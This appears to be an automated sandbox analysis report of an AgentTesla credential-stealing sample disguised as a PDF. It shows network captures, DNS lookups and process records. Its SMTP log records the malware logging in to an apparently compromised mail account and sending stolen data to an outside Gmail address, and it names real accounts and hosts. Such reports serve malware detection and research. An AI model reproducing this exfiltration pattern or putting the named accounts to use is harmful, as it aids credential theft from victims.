                                  Nov 27, 2020 14:24:55.459353924 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.459453106 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.501156092 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.501204967 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.501315117 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.501358032 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.537703991 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.576322079 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.576375961 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.576575994 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.576625109 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.577052116 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.577094078 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.577122927 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.577147961 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.578737020 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.578814030 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.578825951 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.578875065 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.580406904 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.580508947 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.588928938 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.606633902 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.617360115 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.617413998 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.617547035 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.617574930 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.618076086 CET4434969792.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.618172884 CET49697443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.652687073 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.652846098 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.653779030 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.653856039 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.653902054 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.653932095 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.653975964 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.653994083 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.655035019 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.655101061 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.655152082 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.655169964 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.656676054 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.656740904 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.656774044 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.656805038 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.658318996 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.658385992 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.658420086 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.658451080 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.659981012 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.660054922 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.660087109 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.660115957 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.661645889 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.661709070 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.661746025 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.661767960 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.663324118 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.663403988 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.663441896 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.663544893 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.664993048 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.665066004 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.665108919 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.665132046 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.666649103 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.666721106 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.666760921 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.666817904 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.668351889 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.668418884 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.668459892 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.668497086 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.669945002 CET4434970292.122.145.220192.168.2.3
                                  Nov 27, 2020 14:24:55.670032024 CET49702443192.168.2.392.122.145.220
                                  Nov 27, 2020 14:24:55.813956976 CET49702443192.168.2.392.122.145.220

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 27, 2020 14:25:04.670833111 CET6015253192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:04.698086977 CET53601528.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:05.383215904 CET5754453192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:05.410538912 CET53575448.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:06.052160978 CET5598453192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:06.087801933 CET53559848.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:06.782588005 CET6418553192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:06.809679985 CET53641858.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:07.517072916 CET6511053192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:07.544064999 CET53651108.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:08.183290005 CET5836153192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:08.210572004 CET53583618.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:08.902954102 CET6349253192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:08.930222034 CET53634928.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:09.579035997 CET6083153192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:09.606163025 CET53608318.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:10.332566023 CET6010053192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:10.359648943 CET53601008.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:11.325078964 CET5319553192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:11.352227926 CET53531958.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:12.437009096 CET5014153192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:12.475356102 CET53501418.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:27.735615015 CET5302353192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:27.762844086 CET53530238.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:28.137470007 CET4956353192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:28.175828934 CET53495638.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:39.478696108 CET5135253192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:40.244265079 CET53513528.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:42.993508101 CET5934953192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:43.819489956 CET5708453192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:43.846821070 CET53570848.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:43.982381105 CET5934953192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:44.009459019 CET53593498.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:44.648421049 CET5882353192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:44.675628901 CET53588238.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:45.610944986 CET5756853192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:45.638127089 CET53575688.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:50.721287012 CET5054053192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:50.748570919 CET53505408.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:52.535218000 CET5436653192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:52.562628984 CET53543668.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:53.285748959 CET5303453192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:53.312868118 CET53530348.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:54.105633020 CET5776253192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:54.141134977 CET53577628.8.8.8192.168.2.3
                                  Nov 27, 2020 14:25:55.094934940 CET5543553192.168.2.38.8.8.8
                                  Nov 27, 2020 14:25:55.122128963 CET53554358.8.8.8192.168.2.3
                                  Nov 27, 2020 14:26:01.857494116 CET5071353192.168.2.38.8.8.8
                                  Nov 27, 2020 14:26:01.884722948 CET53507138.8.8.8192.168.2.3
                                  Nov 27, 2020 14:26:06.416886091 CET5613253192.168.2.38.8.8.8
                                  Nov 27, 2020 14:26:06.463174105 CET53561328.8.8.8192.168.2.3
                                  Nov 27, 2020 14:26:30.786530972 CET5898753192.168.2.38.8.8.8
                                  Nov 27, 2020 14:26:30.813698053 CET53589878.8.8.8192.168.2.3
                                  Nov 27, 2020 14:26:37.246206999 CET5657953192.168.2.38.8.8.8
                                  Nov 27, 2020 14:26:37.273241997 CET53565798.8.8.8192.168.2.3
                                  Nov 27, 2020 14:26:39.794296980 CET6063353192.168.2.38.8.8.8
                                  Nov 27, 2020 14:26:39.837749958 CET53606338.8.8.8192.168.2.3

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Nov 27, 2020 14:25:39.478696108 CET192.168.2.38.8.8.80xdcfbStandard query (0)webmail.hapkidocollege.com.auA (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.786530972 CET192.168.2.38.8.8.80xb745Standard query (0)api.ipify.orgA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Nov 27, 2020 14:25:40.244265079 CET8.8.8.8192.168.2.30xdcfbNo error (0)webmail.hapkidocollege.com.au103.9.171.52A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.66.103A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.28A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.164.148A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com184.73.247.141A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                  Nov 27, 2020 14:26:30.813698053 CET8.8.8.8192.168.2.30xb745No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.220.115A (IP address)IN (0x0001)

                                  HTTPS Packets

                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                  Nov 27, 2020 14:26:31.051835060 CET174.129.214.20443192.168.2.349742CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                  CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                                  CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                                  SMTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Nov 27, 2020 14:25:41.367238998 CET58749719103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:40 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:25:41.368335009 CET49719587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:25:41.634421110 CET58749719103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:25:41.634907961 CET49719587192.168.2.3103.9.171.52AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
                                  Nov 27, 2020 14:25:42.231693029 CET49719587192.168.2.3103.9.171.52AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
                                  Nov 27, 2020 14:25:42.934869051 CET49719587192.168.2.3103.9.171.52AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
                                  Nov 27, 2020 14:25:43.755945921 CET58749719103.9.171.52192.168.2.3334 UGFzc3dvcmQ6
                                  Nov 27, 2020 14:25:44.048384905 CET58749719103.9.171.52192.168.2.3235 Authentication succeeded
                                  Nov 27, 2020 14:25:44.048794031 CET49719587192.168.2.3103.9.171.52MAIL FROM:<train@hapkidocollege.com.au>
                                  Nov 27, 2020 14:25:44.314590931 CET58749719103.9.171.52192.168.2.3250 OK
                                  Nov 27, 2020 14:25:44.317465067 CET49719587192.168.2.3103.9.171.52RCPT TO:<akannwater@gmail.com>
                                  Nov 27, 2020 14:25:44.657011032 CET58749719103.9.171.52192.168.2.3250 Accepted
                                  Nov 27, 2020 14:25:44.657308102 CET49719587192.168.2.3103.9.171.52DATA
                                  Nov 27, 2020 14:25:44.922913074 CET58749719103.9.171.52192.168.2.3354 Enter message, ending with "." on a line by itself
                                  Nov 27, 2020 14:25:47.853806973 CET58749719103.9.171.52192.168.2.3250 OK id=1kidkt-003UbD-Iv
                                  Nov 27, 2020 14:25:49.862801075 CET58749724103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:48 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:25:49.866229057 CET49724587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:25:50.129899979 CET58749724103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:25:50.262506008 CET58749724103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:00.085405111 CET58749730103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:25:58 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:00.085947990 CET49730587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:26:00.349783897 CET58749730103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:26:00.356672049 CET58749730103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:10.958657980 CET58749739103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:09 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:10.958883047 CET49739587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:26:11.222681046 CET58749739103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:26:11.264421940 CET58749739103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:19.524956942 CET58749740103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:18 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:19.639858961 CET58749740103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:28.998317957 CET58749741103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:27 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:29.236226082 CET58749741103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:37.362380981 CET58749743103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:36 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:37.579276085 CET58749743103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:39.885345936 CET58749745103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:38 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:40.144205093 CET58749745103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:26:53.247958899 CET58749747103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:26:51 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:26:53.248662949 CET49747587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:26:53.512720108 CET58749747103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:26:53.513416052 CET49747587192.168.2.3103.9.171.52AUTH login dHJhaW5AaGFwa2lkb2NvbGxlZ2UuY29tLmF1
                                  Nov 27, 2020 14:26:53.778031111 CET58749747103.9.171.52192.168.2.3334 UGFzc3dvcmQ6
                                  Nov 27, 2020 14:26:54.061188936 CET58749747103.9.171.52192.168.2.3235 Authentication succeeded
                                  Nov 27, 2020 14:26:54.061547995 CET49747587192.168.2.3103.9.171.52MAIL FROM:<train@hapkidocollege.com.au>
                                  Nov 27, 2020 14:26:54.325247049 CET58749747103.9.171.52192.168.2.3250 OK
                                  Nov 27, 2020 14:26:54.325603008 CET49747587192.168.2.3103.9.171.52RCPT TO:<akannwater@gmail.com>
                                  Nov 27, 2020 14:26:54.678740025 CET58749747103.9.171.52192.168.2.3250 Accepted
                                  Nov 27, 2020 14:26:54.679126978 CET49747587192.168.2.3103.9.171.52DATA
                                  Nov 27, 2020 14:26:54.942570925 CET58749747103.9.171.52192.168.2.3354 Enter message, ending with "." on a line by itself
                                  Nov 27, 2020 14:26:55.735517979 CET49747587192.168.2.3103.9.171.52.
                                  Nov 27, 2020 14:26:56.002332926 CET58749747103.9.171.52192.168.2.3250 OK id=1kidm1-003UfT-Jb
                                  Nov 27, 2020 14:27:06.204503059 CET58749747103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection
                                  Nov 27, 2020 14:27:06.486670017 CET58749748103.9.171.52192.168.2.3220-c5s3-4e-syd.hosting-services.net.au ESMTP Exim 4.93 #2 Sat, 28 Nov 2020 00:27:05 +1100
                                  220-We do not authorize the use of this system to transport unsolicited,
                                  220 and/or bulk e-mail.
                                  Nov 27, 2020 14:27:06.486910105 CET49748587192.168.2.3103.9.171.52EHLO 632922
                                  Nov 27, 2020 14:27:06.750746965 CET58749748103.9.171.52192.168.2.3250-c5s3-4e-syd.hosting-services.net.au Hello 632922 [84.17.52.25]
                                  250-SIZE 52428800
                                  250-8BITMIME
                                  250-PIPELINING
                                  250-AUTH PLAIN LOGIN
                                  250-STARTTLS
                                  250 HELP
                                  Nov 27, 2020 14:27:06.768119097 CET58749748103.9.171.52192.168.2.3421 c5s3-4e-syd.hosting-services.net.au lost input connection

                                  Code Manipulations

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:14:25:01
                                  Start date:27/11/2020
                                  Path:C:\Users\user\Desktop\Arrivalnotice2020pdf.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe'
                                  Imagebase:0xb0000
                                  File size:387584 bytes
                                  MD5 hash:ED6F9A5ACE6367F4E532DD4EC40762AC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:14:25:01
                                  Start date:27/11/2020
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6b2800000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:14:25:02
                                  Start date:27/11/2020
                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                  Imagebase:0xda0000
                                  File size:69632 bytes
                                  MD5 hash:88BBB7610152B48C2B3879473B17857E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Disassembly

                                  Code Analysis

                                  Reset < >